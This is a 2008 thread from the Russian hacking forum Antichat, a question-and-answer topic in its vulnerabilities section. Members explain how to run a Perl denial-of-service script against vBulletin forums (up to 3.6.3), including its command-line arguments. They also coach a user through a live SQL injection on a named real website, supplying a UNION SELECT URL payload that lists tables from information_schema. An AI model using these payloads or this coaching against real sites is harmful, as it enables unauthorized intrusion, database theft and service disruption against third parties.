ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[Задай Вопрос - Получи Ответ]
  #1  
Старый 12.08.2008, 16:41
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию [Задай Вопрос - Получи Ответ]

Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп

Последний раз редактировалось ZAMUT; 12.08.2008 в 18:33..
 
Ответить с цитированием

  #2  
Старый 13.08.2008, 18:15
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию

Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48
 
Ответить с цитированием

  #3  
Старый 13.08.2008, 22:22
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от ReanimatoR  
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48
1. Насчет версии, тут наверное гугл лучший помощник: вбиваешь кусок текста из сплоента (лучше тот, где идет формирование отправляемого пакета) в гугл и смотришь на заголовки тем в которых нашелся этот сплоент (к сожалению не могу с жопореза нормально просмотреть сайты), но заметил что даты постов с этим сплойтом идут за 2006-2007 год, т.е. он явно старенький и скорее всего не актуальный в новых версиях.

2. Какие параметры?, это видно из исходника сплоента:

Код:
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
Два параметра - хост и директория с форумом, т.е. запускать так:
perl c:/1.pl www.test1.ru /forum/

Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет:

Код:
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
А если форум находится в корне сайта, то вторым параметром должен быть просто слеш.

P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу.

Последний раз редактировалось Grey; 13.08.2008 в 22:28..
 
Ответить с цитированием

  #4  
Старый 14.08.2008, 08:48
Аватар для MVadim
MVadim
Постоянный
Регистрация: 06.10.2007
Сообщений: 681
Провел на форуме:
3899205

Репутация: 429


Отправить сообщение для MVadim с помощью ICQ
По умолчанию

гугл сказал что это для версии vBulletin <= 3.6.3
 
Ответить с цитированием

  #5  
Старый 14.08.2008, 14:12
Аватар для glower
glower
Новичок
Регистрация: 12.08.2008
Сообщений: 2
Провел на форуме:
6678

Репутация: 1
По умолчанию

всем хай,научите новичка sql инъекции... плиз
 
Ответить с цитированием

  #6  
Старый 14.08.2008, 14:31
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то
 
Ответить с цитированием

  #7  
Старый 14.08.2008, 16:33
Аватар для viv
viv
Новичок
Регистрация: 14.08.2008
Сообщений: 3
Провел на форуме:
6327

Репутация: 0
По умолчанию

Привет всем
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?
 
Ответить с цитированием

  #8  
Старый 14.08.2008, 17:10
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от viv  
Привет всем
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?
Там пятая ветка , вся информация в schema:

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*
 
Ответить с цитированием

  #9  
Старый 14.08.2008, 17:20
Аватар для viv
viv
Новичок
Регистрация: 14.08.2008
Сообщений: 3
Провел на форуме:
6327

Репутация: 0
По умолчанию

Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
 
Ответить с цитированием

  #10  
Старый 14.08.2008, 17:25
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от viv  
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках

К посту ниже:
Выполни Все рекоммендации

Последний раз редактировалось jokester; 14.08.2008 в 18:19.. Причина: Дополнил
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ